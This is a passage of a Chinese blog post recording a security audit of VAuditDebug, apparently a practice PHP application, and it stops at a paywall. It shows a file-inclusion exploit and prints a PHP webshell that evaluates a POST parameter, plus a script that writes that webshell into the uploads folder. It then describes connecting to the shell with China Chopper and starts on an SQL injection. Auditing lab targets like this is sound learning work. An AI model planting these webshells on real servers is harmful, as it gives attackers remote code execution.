全方位对VAuditDebug版本进行代码审计和漏洞利用,最后修复,主要记录审计过程和思路,此博客会持续更新。
day1
先使用Seay代码审计工具进行扫描,共发现49个疑似漏洞,逐一对漏洞进行分析。

ID1
根据提示疑似文件包含漏洞,查看页面源代码发现该页面存在参数'module',如果没有进行传递便正常显示,如果传递则引用该参数。看到这里就感觉妥了,尽管它对引用参数进行限制但include函数在进行文件包含时会把所有文件均当做PHP文件进行解析。

我们尝试直接在本地服务器创建shell.inc文件,使用文件包含访问本地服务器getshell。shell.inc代码如下
<?php eval($_POST['code']) ?>
见证奇迹,访问成功,接下来了向服务器写入木马文件
<?php
$fp=fopen('uploads/shell.php','w');
fwrite($fp,'<?php eval($_POST['code']); ?>');
fclose($fp);
?>

到了这一步直接上中国菜刀,轻松连接上,而我们知道sys和upload文件夹是拥有写入权限的,理论上可以为所欲为了

ID2
根据提示找到messageDetail.php,查看源代码,有是个不得了的发现,简单查找发现这是留言的详情页面,而且未对用户输入的ID字段做检测,但通过sqlwaf函数进行了替换,既然没做检测我们绕过他

本文详细记录了一次对VAuditDebug版本的代码审计过程,包括使用Seay工具发现49个疑似漏洞,重点分析了文件包含漏洞、SQL注入、XSS攻击等,并展示了如何利用和修复这些漏洞。通过爆破登录、构造SQL注入payload以及利用文件系统漏洞获取shell,揭示了Web应用安全的重要性。
最低0.47元/天 解锁文章
1471

被折叠的 条评论
为什么被折叠?



